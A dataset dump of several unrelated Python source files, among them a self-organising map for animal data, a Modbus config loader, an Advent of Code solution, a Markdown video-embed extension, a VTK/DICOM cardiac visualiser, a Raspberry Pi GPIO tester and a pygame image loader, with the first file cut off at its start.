k])\n data = np.array(data, dtype='O')\n animalData = np.reshape(data, (32, 84))\n\n ######### Import animal names ############\n data = []\n with open('/home/andrej/school/ann-course/lab2/animalnames.txt', 'r') as f:\n d = f.readlines()\n for i in d:\n k = i.rstrip(\"'\").split()\n data.append([i for i in k])\n data = np.array(data, dtype='O')\n animalNames = data\n animalNames = np.squeeze(animalNames)\n ########################################\n\n ####### init som and weights ###########\n som = SOM(nNodes=100, inputDim=84, nClass=32)\n weights = som.initWeights()\n epochs = 20\n ######################################\n\n ######## Training ###################\n for epoch in range(epochs):\n for i in range(32):\n iBest = som.euclidianDist(animalData[i][:])\n # print(iBest)\n neighbours = som.neighbourhood(iBest, epoch, epochs)\n # print(neighbours)\n som.weightsUpdate(animalData[i][:], neighbours)\n ######################################\n\n ########## Testing ##################\n winnerIndexes = []\n for i in range(32):\n iBest = som.euclidianDist(animalData[i][:])\n winnerIndexes.append(iBest)\n ######################################\n\n animalNames = np.ndarray.tolist(animalNames)\n animalNames = [x for _, x in sorted(zip(winnerIndexes, animalNames))]\n print(animalNames)\n winnerIndexes = sorted(winnerIndexes)\n # print(winnerIndexes)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"RBF, CL, SOM/som_animals.py","file_name":"som_animals.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"12610386","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore\nimport os\n\nSERVER_PORT = 502\nCLIENT_ADDR = \"127.0.0.1\"\nCLIENT_PORT = 502\nSEGMAC = \"241.0.0.1\"\nSCMAC = \"0.0.0.241.0.0.0.1\"\nPROTO_ID = 0\n\nFREQ_ADDR = 0x00F5\nTEMP_UPPER = 0x4100\nTEMP_LOWER = 0x4101\nMOISTURE_UPPER = 0x4102\nMOISTURE_LOWER = 0x4103\nEARTH_TEMP_UPPER = 0x4104\nEARTH_TEMP_LOWER = 0x4105\nEARTH_MOISTURE_UPPER = 0x4106\nEARTH_MOISTURE_LOWER = 0x4107\nCO2_UPPER = 0x4108\nCO2_LOWER = 0x4109\nILLUM_UPPER = 0x410A\nILLUM_LOWER = 0x410B\nCOMMAND_ADDR = 0x2100\n\nINI_FILE = \".\" + os.sep + \"config.ini\"\n\ndef loadConfig():\n\tglobal SERVER_PORT, CLIENT_ADDR, CLIENT_PORT\n\tsettings = QtCore.QSettings(INI_FILE, QtCore.QSettings.IniFormat)\n\tSERVER_PORT = int(settings.value(\"server-port\", SERVER_PORT).toString())\n\tCLIENT_ADDR = settings.value(\"client-addr\", CLIENT_ADDR).toString()\n\tCLIENT_PORT = int(settings.value(\"client-port\", CLIENT_PORT).toString())","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269087948","text":"memory = []\r\nmask = ''\r\n\r\ndef find(a, m):\r\n # address and mask \r\n a = bin(int(a))\r\n a = a.replace('b', '0' * (37 - len(a)))\r\n lm = list(m)\r\n la = list(a)\r\n for i in range(len(lm)):\r\n if lm[i] != '0':\r\n la[i] = lm[i]\r\n \r\n # number of binary numbers\r\n a = ''.join(la)\r\n bn = a.count('X')\r\n\r\n mx = ''\r\n for x in range(bn):\r\n mx += '1'\r\n \r\n mx = int(mx, 2)\r\n\r\n # all bi possibilities\r\n ab = []\r\n for i in range(mx + 1):\r\n bi = bin(int(i))[2:].zfill(bn)\r\n bi = list(bi)\r\n ab.append(bi)\r\n \r\n # all addresses\r\n aa = []\r\n for q in ab:\r\n ind = 0\r\n dup = list(a)\r\n a = list(a)\r\n for x in range(len(a)):\r\n if a[x] == 'X':\r\n dup[x] = q[ind]\r\n ind += 1\r\n aa.append(int((''.join(dup)), 2))\r\n return aa\r\n\r\nfor line in open(\"inputs/day14.txt\"):\r\n line = line.rstrip('\\n')\r\n key, val = line.split(' = ')\r\n if key == 'mask':\r\n mask = val\r\n print(mask)\r\n else:\r\n mem = key[4 : -1]\r\n add = find(mem, mask)\r\n dup = False\r\n loop = 0\r\n for x in memory:\r\n if x[0] in add:\r\n index = add.index(x[0])\r\n del add[index]\r\n memory[loop][1] = val\r\n loop += 1\r\n for x in add:\r\n memory.append([x, val])\r\n\r\nsums = 0\r\nfor x in memory:\r\n sums += int(x[1])\r\n\r\nprint(sums)\r\n\r\n# memory = []\r\n# mask = ''\r\n\r\n# for line in open(\"inputs/day14.txt\"):\r\n# line = line.rstrip('\\n')\r\n# key, val = line.split(' = ')\r\n# if key == 'mask':\r\n# mask = val\r\n# else:\r\n# val = bin(int(val))\r\n# val = val.replace('b', '0' * (37 - len(val)))\r\n# lm = list(mask)\r\n# lv = list(val)\r\n# for i in range(len(lm)):\r\n# if lm[i] != 'X':\r\n# lv[i] = lm[i]\r\n# mask = ''.join(lm)\r\n# val = ''.join(lv)\r\n# mem = key[4 : -1]\r\n# dup = False\r\n# loop = 0\r\n# for x in memory:\r\n# if x[0] == mem:\r\n# dup = True\r\n# memory[loop][1] = val\r\n# loop += 1\r\n# if dup == False:\r\n# memory.append([mem, val])\r\n\r\n# sums = 0\r\n# for x in memory:\r\n# sums += int(x[1], 2)\r\n \r\n# print(sums)","sub_path":"2020/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"344515906","text":"#!/usr/bin/env python\n\nimport zmarkdown\nfrom zmarkdown.util import etree\nfrom zmarkdown.blockprocessors import BlockProcessor\nimport re\n\n\nclass VideoExtension(zmarkdown.Extension):\n def __init__(self, js_support=False, **kwargs):\n zmarkdown.Extension.__init__(self)\n\n self.config = {\n 'dailymotion_width': ['480', 'Width for Dailymotion videos'],\n 'dailymotion_height': ['270', 'Height for Dailymotion videos'],\n 'vimeo_width': ['500', 'Width for Vimeo videos'],\n 'vimeo_height': ['281', 'Height for Vimeo videos'],\n 'yahoo_width': ['624', 'Width for Yahoo! videos'],\n 'yahoo_height': ['351', 'Height for Yahoo! videos'],\n 'youtube_width': ['560', 'Width for Youtube videos'],\n 'youtube_height': ['315', 'Height for Youtube videos'],\n 'ina_width': ['620', 'Width for INA videos'],\n 'ina_height': ['349', 'Height for INA videos'],\n 'jsfiddle': [False, ''],\n 'jsfiddle_width': ['560', 'Width for jsfiddle'],\n 'jsfiddle_height': ['560', 'Height for jsfiddle'],\n }\n\n self.config['youtube_short_width'] = self.config['youtube_width']\n self.config['youtube_short_height'] = self.config['youtube_height']\n\n # Override defaults with user settings\n for key, value in kwargs.items():\n self.setConfig(key, value)\n\n if js_support:\n self.setConfig(\"jsfiddle\", True)\n\n def add_inline(self, md, name, klass, pat):\n RE = r'(^|\\n)!\\(' + pat + r'\\)'\n md.parser.blockprocessors.add(\"video-\" + name,\n klass(md, RE,\n self.config[\"{}_width\".format(name)][0],\n self.config[\"{}_height\".format(name)][0]),\n \">reference\")\n\n def extendZMarkdown(self, md, md_globals):\n self.add_inline(md, 'dailymotion', Dailymotion,\n r'https?://www\\.dailymotion\\.com/video/(?P[a-z0-9]+)(_[\\w\\-]*)?')\n self.add_inline(md, 'vimeo', Vimeo,\n r'https?://(www.|)vimeo\\.com/(?P\\d+)\\S*')\n self.add_inline(md, 'yahoo', Yahoo,\n r'https?://screen\\.yahoo\\.com/.+/?')\n self.add_inline(md, 'youtube', Youtube,\n r'https?://(www\\.)?youtube\\.com/watch\\?\\S*v=(?P\\S[^&/]+)'\n r'(?P&ab_channel=[\\w%]+)?')\n self.add_inline(md, 'youtube_short', Youtube,\n r'https?://youtu\\.be/(?P\\S[^?&/]+)?')\n self.add_inline(md, 'ina', Ina,\n r'https?://www\\.ina\\.fr/video/(?P[A-Z0-9]+)/([\\w\\-]*)\\.html')\n if self.config[\"jsfiddle\"][0]:\n self.add_inline(md, 'jsfiddle', JsFiddle,\n r'https?://(www.|)jsfiddle\\.net(/(?P\\w+))?/'\n r'(?P\\w+)(/(?P[0-9]+)|)/?')\n\n\nclass VideoBProcessor(BlockProcessor):\n def __init__(self, md, patt, width, height):\n BlockProcessor.__init__(self, md.parser)\n self.md = md\n self.width = width\n self.height = height\n self.RE = re.compile(patt)\n\n def test(self, parent, block):\n return bool(self.RE.search(block))\n\n def run(self, parent, blocks):\n m = self.RE.search(blocks[0])\n\n el = self.handle_match(m)\n if el is None:\n return False\n\n block = blocks.pop(0)\n before = block[:m.start()]\n after = block[m.end():]\n\n if before: # pragma: no cover\n # This should never occur because regex require that the expression is starting the block.\n # Do not raise an exception because exception should never be generated.\n self.md.parser.parseBlocks(parent, [before])\n\n parent.append(el)\n\n if after:\n blocks.insert(0, after)\n\n @staticmethod\n def extract_url(_): # pragma: no cover\n # Should be overridden in sub-class\n return \"\"\n\n def handle_match(self, m):\n url = self.extract_url(m)\n if url is None:\n return None\n return self.render_iframe(url, self.width, self.height)\n\n @staticmethod\n def render_iframe(url, width, height):\n iframe = etree.Element('iframe')\n iframe.set('width', width)\n iframe.set('height', height)\n iframe.set('src', url)\n iframe.set('allowfullscreen', 'true')\n iframe.set('frameborder', '0')\n return iframe\n\n\nclass Dailymotion(VideoBProcessor):\n @staticmethod\n def extract_url(m):\n return 'https://www.dailymotion.com/embed/video/%s' % m.group('dailymotionid')\n\n\nclass Vimeo(VideoBProcessor):\n @staticmethod\n def extract_url(m):\n return 'https://player.vimeo.com/video/%s' % m.group('vimeoid')\n\n\nclass Yahoo(VideoBProcessor):\n @staticmethod\n def extract_url(m):\n return m.string + '?format=embed&player_autoplay=false'\n\n\nclass Youtube(VideoBProcessor):\n @staticmethod\n def extract_url(m):\n return 'https://www.youtube.com/embed/%s' % m.group('youtubeid')\n\n\nclass Ina(VideoBProcessor):\n @staticmethod\n def extract_url(m):\n return 'http://player.ina.fr/player/embed/%s/1/1b0bd203fbcd702f9bc9b10ac3d0fc21/560/315/1/148db8' % m.group(\n 'inaid')\n\n\nclass JsFiddle(VideoBProcessor):\n @staticmethod\n def extract_url(m):\n fields = (m.group('jsfiddleuser'), m.group('jsfiddleid'), m.group('jsfiddlerev'))\n if fields[0] is not None and fields[2] is None:\n # Only two part, revision could be in id pattern\n try:\n int(fields[1])\n # It is a revision !\n fields = (None, fields[0], fields[1])\n except ValueError:\n pass\n if fields[0] is not None and fields[1] is not None and fields[2] is None:\n # Base version link, should not be allowed because content can be changed externally\n return None\n base = \"https://jsfiddle.net/{}/embedded/result,js,html,css/\"\n return base.format(\"/\".join([t for t in fields if t is not None]))\n\n\ndef makeExtension(*args, **kwargs):\n return VideoExtension(*args, **kwargs)\n","sub_path":"zmarkdown/extensions/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539100876","text":"import vtk\nimport numpy as np\nimport pydicom as dicom\nimport platform\nimport os\nimport time\nimport vtk.util.numpy_support as vtknp\nimport glob\nimport re\n\n\nminValGr = 0.0 # Skalierung der Grauwerte\nmaxValGr = 255.0\ndiffValGr = maxValGr - minValGr\n\ncountList = []\ncount = -1\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef close_window(iren):\n render_window = iren.GetRenderWindow()\n render_window.Finalize()\n iren.TerminateApp()\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef showAxes():\n axes = vtk.vtkAxesActor()\n widget = vtk.vtkOrientationMarkerWidget()\n widget.SetOrientationMarker(axes)\n widget.SetInteractor(iren)\n widget.SetEnabled(1)\n widget.InteractiveOn()\n\n return(axes, widget)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef timer_callback(obj, event):\n global updateVectors, numTimeSteps, numSlices, count, minDiffAtPos\n\n count = (count + 1) % numTimeSteps\n\n for actImage in range(numSlices):\n images[actImage].GetPointData().SetScalars(listOfVTKDataLists[actImage][updateVectors[actImage][count]])\n\n iren.Render()\n\n actMesh[...] = displacements[timeVectors[minDiffAtPos][updateVectors[minDiffAtPos][count]]]\n polydata.Modified()\n\n iren.GetRenderWindow().Render()\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef calcUpdateVector(timeVectors, pos):\n numSlices = len(timeVectors)\n numTimeSteps = len(timeVectors[pos])\n\n updateVectors = np.ndarray((numSlices, numTimeSteps), int)\n\n for i in range(numSlices):\n lowerIndex = 0\n for j in range(numTimeSteps):\n needVal = True\n if i == pos:\n updateVectors[i][j] = j\n continue\n else:\n actTime = timeVectors[pos][j]\n upperIndex = len(timeVectors[i])\n\n lastDiff = float('Inf')\n\n for k in range(lowerIndex, upperIndex):\n actDiff = int(abs(actTime - timeVectors[i][k]))\n\n if actDiff == 0:\n updateVectors[i][j] = k\n needVal = False\n break\n\n if actDiff < lastDiff:\n lastDiff = actDiff\n else:\n updateVectors[i][j] = k - 1\n needVal = False\n break\n\n lowerIndex = k\n\n if needVal:\n updateVectors[i][j] = k\n\n return updateVectors\n\n\n\ndef DTWcalcUpdateVector(timeVectors, pos):\n numSlices = len(timeVectors)\n numTimeSteps = len(timeVectors[pos])\n\n updateVectors = np.ndarray((numSlices, numTimeSteps), int)\n\n for i in range(numSlices):\n lowerIndex = 0\n for j in range(numTimeSteps):\n needVal = True\n if i == pos:\n updateVectors[i][j] = j\n continue\n else:\n actTime = timeVectors[pos][j]\n upperIndex = len(timeVectors[i])\n\n lastDiff = float('Inf')\n\n for k in range(lowerIndex, upperIndex):\n actDiff = int(abs(actTime - timeVectors[i][k]))\n\n if actDiff == 0:\n updateVectors[i][j] = k\n needVal = False\n break\n\n if actDiff < lastDiff:\n lastDiff = actDiff\n else:\n updateVectors[i][j] = k - 1\n needVal = False\n break\n\n lowerIndex = k\n\n if needVal:\n updateVectors[i][j] = k\n\n return updateVectors\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef readFilesToDicomArray(path, listOfSeries):\n listOfDicomArrays = []\n listOfPixelDims = []\n listOfPixelSpacings = []\n listOfPlaneShapes = []\n listOfMaxCounts = []\n listOfMatrices = []\n\n\n dictFilesDCM = {}\n\n for series in listOfSeries: # für jeden Ordner\n for dirName, subdirList, fileList in os.walk(path + series):\n for filename in fileList:\n if \".dcm\" in filename.lower():\n actDs = dicom.read_file(os.path.join(dirName, filename))\n pos = str(actDs.ImagePositionPatient + actDs.ImageOrientationPatient)\n\n if (pos not in dictFilesDCM):\n dictFilesDCM[pos] = {}\n dictFilesDCM[pos][actDs.InstanceNumber] = os.path.join(dirName, filename)\n\n minDiffAtPos = -1\n minDiff = float('Inf')\n\n timeVectors = []\n\n\n for actPos, actDict in dictFilesDCM.items(): # für jede Slice\n sortEntries = sorted(actDict)\n\n actTimeVector = []\n timeVectors.append(actTimeVector)\n\n first = True\n actIndex = 0\n\n for actFile in sortEntries: # für jedes einzelne Bild\n\n actDicom = dicom.read_file(actDict[actFile])\n\n if first: # organisiere Metadaten + ArrayDicom anlegen\n first = False\n\n winCen = actDicom.WindowCenter\n winWidth = actDicom.WindowWidth\n resIntercept = actDicom.RescaleIntercept\n resSlope = actDicom.RescaleSlope\n\n ConstPixelDims = (len(sortEntries),\n int(actDicom.Rows),\n int(actDicom.Columns))\n\n planeShape = (int(actDicom.Rows), int(actDicom.Columns), 1)\n\n ConstPixelSpacing = (float(actDicom.PixelSpacing[0]),\n float(actDicom.PixelSpacing[1]),\n float(actDicom.SliceThickness))\n\n position = actDicom.ImagePositionPatient\n orientation = actDicom.ImageOrientationPatient\n\n xdir = orientation[0:3]\n ydir = orientation[3:6]\n zdir = [0.0, 0.0, 0.0]\n\n vtk.vtkMath.Cross(xdir, ydir, zdir)\n\n matrix = vtk.vtkMatrix4x4()\n\n for i in range(3):\n matrix.SetElement(i, 0, xdir[i])\n matrix.SetElement(i, 1, ydir[i])\n matrix.SetElement(i, 2, zdir[i])\n matrix.SetElement(i, 3, position[i])\n\n ArrayDicom = np.zeros(ConstPixelDims, dtype = float)\n\n actTimeVector.append(int(actDicom.TriggerTime))\n\n ArrayDicom[actIndex, :, :] = actDicom.pixel_array\n actIndex += 1\n\n np.clip(resSlope * diffValGr / (winWidth - 1) * ArrayDicom + ((resIntercept - winCen) / (winWidth - 1) + 0.5) * diffValGr + minValGr,\n minValGr, maxValGr, out = ArrayDicom)\n\n listOfMaxCounts.append(len(sortEntries))\n listOfDicomArrays.append(ArrayDicom)\n listOfPixelDims.append(ConstPixelDims)\n listOfPixelSpacings.append(ConstPixelSpacing)\n listOfPlaneShapes.append(planeShape)\n listOfMatrices.append(matrix)\n\n\n for i in range(len(timeVectors)):\n actTimeVector = timeVectors[i]\n factor = 800.0 / actTimeVector[-1]\n\n for j in range(len(actTimeVector)):\n actTimeVector[j] = int(factor * actTimeVector[j])\n\n if len(actTimeVector) > 0:\n tempDiff = actTimeVector[1] - actTimeVector[0]\n if tempDiff < minDiff:\n minDiff = tempDiff\n minDiffAtPos = i\n\n return (listOfDicomArrays, listOfPixelDims, listOfPixelSpacings,\n listOfPlaneShapes, listOfMaxCounts, listOfMatrices, minDiffAtPos,\n timeVectors)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef getAllVTKDataLists(listOfDicomArrays):\n\n resultList = []\n\n for ArrayDicom in listOfDicomArrays:\n VTK_dataList = []\n\n for actImage in range(len(ArrayDicom)):\n VTK_dataList.append(vtknp.numpy_to_vtk(ArrayDicom[actImage].ravel(),deep=True, array_type=vtk.VTK_FLOAT))\n\n resultList.append(VTK_dataList)\n\n return resultList\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef readDynpt():\n f = open(pathIn + \"simulation/x.dynpt\", 'rb')\n header = dict(re.findall(r\"(\\w*):(\\w*)\", f.read(1024).decode('utf-8')))\n\n shapeTest = [int(header['t']), int(header['x']), 3]\n\n data = np.fromfile(f, dtype=np.float32)\n\n if header['unites_x'] == \"um\":\n data /= 1000\n\n return(header, data.reshape(shapeTest))\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef getModelPosition():\n minZPos = float(\"inf\")\n\n for dirName, subdirList, fileList in os.walk(pathIn + \"segmentation\"):\n for filename in fileList:\n if \".dcm\" in filename.lower():\n actDs = dicom.read_file(os.path.join(dirName, filename))\n actZPos = actDs.ImagePositionPatient[2]\n\n if actZPos < minZPos:\n minZPos = actZPos\n\n return [actDs.ImagePositionPatient[0], actDs.ImagePositionPatient[1], minZPos]\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\nif platform.platform()[0] == \"W\":\n print(\"OS: win\")\n pathIn = \"c:/users/vch/desktop/Bredies/CASE01/\"\n pathIn = \"c:/users/vch/Desktop/ILHgit/\"\n\nelse:\n print(\"OS: not win\")\n pathIn = \"/home/horakv/Desktop/Bredies/CASE01/\"\n pathIn = \"/home/horakv/Desktop/ILHgit/\"\n\n\nseriesList = []\n\nseriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9111835162.607/\") # 40\nseriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9111848390.608/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9111901895.609/\") # 25*16\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9112235900.610/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9112254187.611/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9112308236.612/\") # 25\nseriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9114136191.628/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9114329783.631/\") # 40\n\n#t0 = time.time()\n\n\n\n\n\npathResult = \"/home/horakv/Desktop/results/withCushion\"\n\n\n\nDTWmatrix = np.load(\"{}matrix15.npy\".format(pathResult))\n\nn, m = DTWmatrix.shape\n\nprint(DTWmatrix.shape, n, m)\n\nDTW = np.full((n+1, m+1), np.inf)\n\n\n#s: array [1..n], t: array [1..m]) {\n#DTW := array [0..n, 0..m]\n\n\nDTW[0][0] = 0\n\nfor i in range(1, n):\n for j in range(1, m):\n DTW[i][j] = DTWmatrix[i][j] + min(DTW[i-1][j], DTW[i][j-1], DTW[i-1][j-1])\n\nb, a = n - 1, m - 1\nDTWpath = []\n\nwhile (b, a) != (0, 0):\n DTWpath.append((a, b))\n b, a = min((b - 1, a), (b, a - 1), (b - 1, a - 1), key=lambda x: DTW[x[0], x[1]])\n\nDTWpath.append((0, 0))\n\n\nDTWpath.sort()\n\n\n\nmin((i, DTWpath[i]) for i in range(len(DTWpath)) )\n\n#cost, path = DTW(matrix)\nprint(DTWpath)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n(listOfDicomArrays, listOfPixelDims, listOfPixelSpacings,\n listOfPlaneShapes, listOfMaxCounts, listOfMatrices, minDiffAtPos,\n timeVectors) = readFilesToDicomArray(pathIn, seriesList)\n\n#t1 = time.time()\n\n#print(\"Zeit:\", t1-t0)\n\n#updateVectors = calcUpdateVector(timeVectors, minDiffAtPos)\nupdateVectors = DTWcalcUpdateVector(timeVectors, minDiffAtPos)\n\nnumSlices = len(timeVectors)\nnumTimeSteps = len(timeVectors[minDiffAtPos])\n\nnumImages = len(listOfDicomArrays)\n\n###############################\n# place for data manipulation #\n###############################\n\n\nlistOfVTKDataLists = getAllVTKDataLists(listOfDicomArrays)\n\n#########################################################\n\nren = vtk.vtkRenderer()\nren.SetBackground(0.8, 0.8, 0.8)\n\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetSize(1000, 1000)\n\nrenWin.AddRenderer(ren)\n\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n#############################\n# =============================================================================\n# axes = vtk.vtkAxesActor()\n# widget = vtk.vtkOrientationMarkerWidget()\n# widget.SetOrientationMarker(axes)\n# widget.SetInteractor(iren)\n# widget.SetEnabled( 1 )\n# widget.InteractiveOn()\n# =============================================================================\n#############################\n\n\nlookupTable = vtk.vtkLookupTable()\nlookupTable.SetNumberOfTableValues(256)\nlookupTable.SetRange(0.0, 255.0)\nfor j in range(256):\n lookupTable.SetTableValue(j, j/255.0, j/255.0, j/255.0, min(j/25.5, 1.0))\nlookupTable.Build()\n\nimages = []\n\nfor actImage in range(numImages):\n image = vtk.vtkImageData()\n image.SetDimensions(listOfPlaneShapes[actImage])\n image.SetSpacing(listOfPixelSpacings[actImage][0], listOfPixelSpacings[actImage][1], 0.0)\n\n image.AllocateScalars(vtk.VTK_FLOAT, 1)\n image.GetPointData().SetScalars(listOfVTKDataLists[actImage][0])\n\n images.append(image)\n\n mapTransparency = vtk.vtkImageMapToColors()\n mapTransparency.SetLookupTable(lookupTable)\n mapTransparency.PassAlphaToOutputOn()\n mapTransparency.SetInputData(image)\n\n mapper = vtk.vtkDataSetMapper()\n mapper.SetInputConnection(mapTransparency.GetOutputPort())\n mapper.SetColorModeToDirectScalars()\n\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetInterpolationToFlat()\n actor.GetProperty().ShadingOff()\n actor.GetProperty().LightingOff()\n actor.SetUserMatrix(listOfMatrices[actImage])\n\n ren.AddActor(actor)\n\n\n\n###############################################################################\n# Struktur des Modells einlesen\n###############################################################################\n\nfilenames = glob.glob(pathIn + 'mesh/*.vtk')\n\nreader = vtk.vtkUnstructuredGridReader()\nreader.SetFileName(filenames[0])\n\ngeometryFilter = vtk.vtkGeometryFilter()\ngeometryFilter.SetInputConnection(reader.GetOutputPort())\ngeometryFilter.Update()\n\npolydata = geometryFilter.GetOutput()\nscalarRange = polydata.GetScalarRange()\n\nactMesh = vtknp.vtk_to_numpy(polydata.GetPoints().GetData())\nactMesh /= 1000 # Daten sind in um statt in mm gegeben -> Korrektur\n\n\n###############################################################################\n# Verschiebungen vorbereiten und Visualisierung\n###############################################################################\n\n(header, displacements) = readDynpt()\n\nmaxCount = len(displacements)\n\nmMapper = vtk.vtkPolyDataMapper()\nmMapper.SetInputData(polydata)\nmMapper.SetScalarRange(scalarRange)\n\n\n\nmActor = vtk.vtkActor()\nmActor.SetMapper(mMapper)\nmActor.SetPosition(getModelPosition())\n\nmActor.GetProperty().SetOpacity(0.2)\n\nif scalarRange == (0.0, 1.0):\n mMapper.ScalarVisibilityOff()\n mActor.GetProperty().SetColor(1,0,0)\n\nren.AddActor(mActor)\n\n###############################################################################\n\niren.Initialize()\niren.AddObserver('TimerEvent', timer_callback)\niren.CreateRepeatingTimer(10)\n\n\nrenWin.Render()\nprint(\"Start\")\niren.Start()\n\n\nif platform.platform()[0] != \"W\":\n close_window(iren)\n del renWin, iren\n","sub_path":"DTWdicomModel2position.py","file_name":"DTWdicomModel2position.py","file_ext":"py","file_size_in_byte":15408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"180054473","text":"import os\n\ntry:\n import _thread\nexcept ImportError:\n import _dummy_thread as _thread\n\nfrom Costants import PORT\nfrom ServerLaunchThread import ServerLaunchThread\n\nos.chdir('..')\nos.chdir('..')\nos.chdir('..')\n\nprint(os.getcwd())\n\nos.chdir('Binaries')\nos.chdir('Win32')\n\nNUM_SERVER = 10\n\nMAX_GAMESPEED = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nthreads = []\n\nfor i in range(NUM_SERVER):\n threads.append(ServerLaunchThread(i, \"Thread-\" + str(i), MAX_GAMESPEED[i], PORT[i], 2400))\n\nfor thread in threads:\n thread.start()","sub_path":"client/testing/TestSpeedServerLaunch.py","file_name":"TestSpeedServerLaunch.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"20026214","text":"try:\n import RPi.GPIO as GPIO\nexcept(ImportError):\n print(\"Failed to import RPI. Aborting.\")\n\nimport time\n\nclass IO:\n def __init__(self):\n GPIO.setmode(GPIO.BCM)\n self.OutputList = [[\"A\", 26],\n [\"B\", 24],\n [\"C\", 22],\n [\"D\", 23],\n [\"E\", 21],\n [\"F\", 19],\n [\"G\", 16],\n [\"H\", 18]]\n self.InputList = [[]]\n self.Initial = True\n if self.Initial == True:\n self.SetupIO()\n\n def SetupIO(self):\n for count in range(0, len(self.OutputList)):\n GPIO.setup(self.OutputList[count][1], GPIO.OUT, initial=GPIO.LOW)\n time.sleep(0.5)\n\n def InitialTest(self):\n print(\"Beginning initial output test...\")\n for count in range(0, len(self.OutputList)):\n for count in range(0,2):\n print(\"Output: {}\".format(self.OutputList[count][0]))\n GPIO.output(self.OutputList[count][1], GPIO.HIGH)\n time.sleep(0.25)\n GPIO.output(self.OutputList[count][1], GPIO.LOW)\n print(\"Complete.\")\n\n def ManualControl(self):\n print(\"\"\"\"\"\")\n\n\n\nIO = IO()\nIO.InitialTest()\n\n\n","sub_path":"AES_Master/AES 4.3/IOTestingUtility.py","file_name":"IOTestingUtility.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619908299","text":"from src.consts import *\nfrom pygame.image import load\n\n\nclass ConverterBase:\n \"\"\"画像変換基底クラス\"\"\"\n _instance = None\n\n def __new__(cls, converter=None):\n if cls._instance is None:\n cls._instance = super().__new__(cls)\n\n return cls._instance\n\n def __init__(self, converter):\n self.converter = converter\n\n def get_converter(self):\n return self.converter\n\n\nclass MapImage(ConverterBase):\n \"\"\"マップ画像変換クラス\"\"\"\n\n def __init__(self):\n converter = {SEA: load(PATH_SEA).convert(),\n SAND: load(PATH_SAND).convert(),\n GLASS: load(PATH_GLASS).convert(),\n FOREST: load(PATH_FOREST).convert(),\n MOUNTAIN: load(PATH_MOUNTAIN).convert(),\n RIVER: load(PATH_RIVER).convert()}\n super().__init__(converter)\n\n\nclass PlayerImage(ConverterBase):\n \"\"\"プレーヤー画像変換クラス\"\"\"\n\n def __init__(self):\n converter = {DIRECTION_UP: load(PATH_IMAGE_PLAYER_UP).convert_alpha(),\n DIRECTION_RIGHT: load(PATH_IMAGE_PLAYER_RIGHT).convert_alpha(),\n DIRECTION_DOWN: load(PATH_IMAGE_PLAYER_DOWN).convert_alpha(),\n DIRECTION_LEFT: load(PATH_IMAGE_PLAYER_LEFT).convert_alpha()}\n super().__init__(converter)\n\n\nclass NationImage(ConverterBase):\n \"\"\"国家画像変換クラス\"\"\"\n\n def __init__(self):\n converter = {NATION_LEVEL_VILLAGE: load(PATH_IMAGE_VILLAGE).convert_alpha(),\n NATION_LEVEL_TOWN: load(PATH_IMAGE_TOWN).convert_alpha(),\n NATION_LEVEL_CASTLE_TOWN: load(PATH_IMAGE_CASTLE_TOWN).convert_alpha(),\n NATION_LEVEL_CASTLE: load(PATH_IMAGE_CASTLE).convert_alpha()}\n 